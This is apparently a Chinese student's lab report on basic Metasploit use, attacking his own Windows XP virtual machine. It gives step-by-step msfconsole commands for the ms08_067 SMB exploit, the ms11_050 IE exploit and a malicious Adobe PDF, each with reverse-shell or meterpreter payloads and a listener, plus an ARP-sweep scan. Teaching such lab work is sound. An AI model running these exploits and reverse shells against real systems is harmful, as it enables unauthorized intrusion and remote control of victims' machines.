20145202马超《网络对抗》Exp5MSF基础应用
20145202马超《网络对抗》Exp5MSF基础应用
本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
实验指导(http://www.cnblogs.com/yayaer/p/6690577.html)
报告内容
MS08_067漏洞渗透攻击实践
1、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
2、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。
这之间遇到了一个问题,电脑卡死了导致再打开kali的时候发现ip不对,不会调,结果偶然间发现n年前快照过一次,恢复快照后又能用了

如果ping不通,一般是ip地址不在同一个网段上,需要重新设置xp的ip地址,打开:控制面板->网络连接->右击本地连接选择属性->选择internet协议(TCP/IP)->属性,就可以编辑ip地址了。例如:kali ip是192.168.23.129,xp ip设置为:192.168.23.128。前三位一样,最后一位随便设置。

3.在kali终端中开启msfconsole。
4.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示

5.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
6、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

7.命令show targets会显示出可以被攻击的靶机的操作系统型号。
8.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
9、输入命令show options显示我们需要在攻击前需要设置的数据。

10、输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip
11、输入命令exploit开始攻击,如下图所示是正常攻击成功结果

IE浏览器渗透攻击——MS11050安全漏洞
1.在kali终端中开启msfconsole。
2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。
3、输入info查看信息:

4.设置对应的载荷set payload windows/meterpreter/reverse_tcp
5、show options查看需要设置的相关信息
6、设置相关信息
set LHOST ‘kali Ip’
set LPORT XXXX
set URIPATH XX

7、exploit,如下图所示,有靶机需要访问的ip地址:

8、在靶机IE上输入网址,并在靶机上查看信息。
到了这里我遇到了一个问题,就是sp3里面的浏览器不是ie7,所以上图会显示成那样,没有session 1,后来我又尝试下了很多ie7的安装包但是实在是太卡了而且无数盗版,所以就没有再做下去,如果换了浏览器理论上是可以做出结果的我距离结果也就差一步,但是这个实验要求上说的很清楚,“掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路”,重点在掌握思路,所以我就没有在做下去,如果扣分的话请老师在评论区里说一下要扣分我就把这个补上。
Adobe阅读器渗透攻击
1、两台虚拟机,其中一台为kali,一台为windows xp sp3。
2、设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。
3、kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置:

4.在kali终端中开启msfconsole。
5、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
6、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
7、输入命令show options显示我们需要在攻击前需要设置的数据.
8.输入命令
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
9.输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

10.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
11、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 5555和攻击模块里的数据设置为一样的。
12、使用命令exploit开始攻击,在xp中打开pdf。如下图:
这很明显,攻击成功了


自己做的辅助模块
1.将kali机的模式改为桥接模式,使他和主机ping通,主机连接的是无线网。
2.先手动创建一个msf所需的数据库
service postgresql start
msfdb start
3、开启msf
4.输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
5.show options查看需要设置的消息,其中rhost填写自己电脑所在网段

6.使用命令,设置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2

7.run

应该是网络的问题,它提示没有ipv4的地址,而且我的虚拟机提示网桥没有正确打开,网桥崩了,求解决方案。
解决了之后有了ip
run之后结果:

当时宿舍没人用电脑,嗯,的确是这样。而且貌似打开防火墙的话扫描不到。
实验指导(http://www.cnblogs.com/yayaer/p/6685527.html)
1.实验后回答问题
(1)用自己的话解释什么是exploit,payload,encode.
exploit:在kali里面进行攻击的时候要使用的代码是exploit
payload:目测来看是一种攻击载体,然而我并不知道什么事攻击载体,感觉类似于声音借助于空气转播,声音是恶意代码,人类是靶机,空气就是payload
encode:直译为编码,顾名思义就是把恶意代码进行编码然后免杀
2.实验总结与体会
- 感觉i3实在是不行了,太慢了。
- 对于这次实验的话,感觉攻击手段还是很多样的,在于如何去发现咯偶懂以及利用漏洞,而我们做的只是利用漏洞,说白了只是完成了最后一击,玩别人剩下的,想必那些黑客门天天研究有哪些漏洞有哪些后门真心挺累的。
- 漏洞这种东西很强大,点开一个pdf就能被控制,而且作为一个平民百姓也不可能用多么高深的手段去防守,与其每天吓唬自己还不如该干啥干啥。
3.实践过程记录,体现学号,可记录自己认为重要的或思考过的点,不需要每步都记录
20145202马超《网络对抗》Exp5MSF基础应用的更多相关文章
- 20145202 《网络对抗技术》 PC平台逆向破解
20145202 <网络对抗技术> PC平台逆向破解 准备工作 先将环境设置为:堆栈可执行.地址随机化关闭 参考http://git.oschina.net/wildlinux/NetSe ...
- 网络对抗——web基础
网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...
- 20145202马超《网络对抗》Exp4 恶意代码分析
20145202马超<网络对抗>Exp4 恶意代码分析 1.实验后回答问题 (1)总结一下监控一个系统通常需要监控什么.用什么来监控. 虽然这次试验的软件很好用,我承认,但是他拖慢了电脑的 ...
- 20155324《网络对抗技术》web安全基础实践
20155324<网络对抗技术>web安全基础实践 实验内容 使用webgoat进行XSS攻击.CSRF攻击.SQL注入 实验问答 SQL注入攻击原理,如何防御 ①SQL注入攻击是攻击者在 ...
- 20155324王鸣宇 《网络对抗技术》Web基础
20155324王鸣宇 <网络对抗技术>Web基础 实践要求 ①Web前端HTML: 能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HT ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用
2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
随机推荐
- Cache及(HttpRuntime.Cache与HttpContext.Current.Cache)
本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/avon520/archive/2009/11/25/4872704.aspx .NET中Cache有两种调用方式:Ht ...
- node-7.2.1 already installed, it's just not linked
直接在terminal下运行以卸载node和nvm: sudo rm -rf /usr/local/{bin/{node,npm},lib/node_modules/npm,lib/node,shar ...
- Hystrix请求熔断与服务降级
Hystrix请求熔断与服务降级 https://www.cnblogs.com/huangjuncong/p/9026949.html SpringCloud实战-Hystrix请求熔断与服务降级 ...
- copy "xxxxx\xx.dll xxxxxxx\ ” 已退出,代码为1 错误解决方法
右键=>属性=>生成事件里面,查看预先生成事件命令行和后期生成事件命令行,查看复制的Dll是否存在已经路径是否正确
- 百度地图Label 样式 setStyle
最近一直在整百度地图,发现一个小问题: 创建文本标注对象设置样式的时候,其中的backgroundColor属性居然还支持透明啊,不过改变数值好像对效果没有影响 var numLabel = new ...
- 解析纯真IP地址库
一周以来,一直在做 IP地址库的解析.从调研到编码到优化,大概花了有七八天的时间.感觉很好玩.总结一下整个做的过程. 1.关于IP 地址库的解析方式 目前主要的解析方式有两种:通过API,或通过IP数 ...
- 【[SHOI2014]概率充电器】
这是一道概率+树形\(dp\) 首先我们看到这里每一个的贡献都是1,所以我们要求的期望就是概率 求得其实就是这个 \[\sum_{i=1}^nP_i\] \(P_i\)为节点\(i\)通电的概率 显然 ...
- node里有没有清理require和dependencies的工具
写node的时候,常常以为自己需要某个package,于是require了一下,结果写着写着,又没有用到,安装了某个包save了一下,最后也没用到. 一个项目写完发现整个require和depende ...
- vue - 数据驱动,组件化, 双向绑定原理
1.数据驱动 传统的前端数据交互是用Ajax从服务端获取数据,然后操作DOM来改变视图: Vue.js 是一个提供了 MVVM 风格的双向数据绑定的 Javascript 库,专注于View 层.它让 ...
- CQRS轻量级框架【CQRSlite】学习使用小记
前言 这几天在研究DDD和CQRS.快把我绕晕了.发现国外的好文质量还是挺高的.之所以先体验CQRSlite这个小框架,是因为看了一位大神写的文章:https://www.codeproject.co ...